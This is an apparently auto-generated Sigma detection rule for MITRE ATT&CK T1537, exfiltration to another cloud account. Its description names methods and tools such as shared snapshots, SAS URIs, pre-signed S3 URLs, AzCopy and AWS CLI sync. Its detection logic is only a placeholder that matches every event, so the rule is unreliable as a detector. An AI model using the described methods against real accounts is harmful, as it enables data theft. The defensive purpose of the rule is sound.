title: Transfer Data to Cloud Account (T1537)
id: df00tech-t1537
status: experimental
description: "Adversaries may exfiltrate data by transferring it to another cloud account they control on the same service. This technique abuses native cloud APIs, storage sharing mechanisms, and CLI tools (such as AzCopy, megatools, or AWS CLI) to move data across cloud account boundaries while blending into normal cloud traffic. Detection is complicated because the traffic stays within the provider's internal network and may not trigger perimeter data loss controls. Common methods include: sharing VM disk snapshots or AMIs to attacker-controlled accounts, generating shared access signature (SAS) URIs or pre-signed S3 URLs for anonymous access, using AzCopy or AWS S3 sync to copy storage contents cross-account, and creating cloud instance backups then exporting them to external subscriptions."
references:
  - https://attack.mitre.org/techniques/T1537/
  - https://df00tech.com/detections/T1537
author: df00tech
date: 2026/04/20
tags:
  - attack.t1537
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - Legitimate cloud migration projects using AzCopy to transfer data between organizational Azure subscriptions owned by different teams or business units
  - Backup and disaster recovery tools that create and export VM snapshots to secondary Azure subscriptions or storage accounts as part of approved BCP/DR procedures
  - "DevOps pipelines and infrastructure-as-code workflows generating SAS tokens programmatically for legitimate cross-service data access (e.g., CI/CD artifact storage)"
  - Data engineering teams using Mega or other cloud storage services for approved data sharing with external partners or contractors
  - Azure Site Recovery and Azure Backup services that internally use snapshot APIs for replication to paired regions
level: high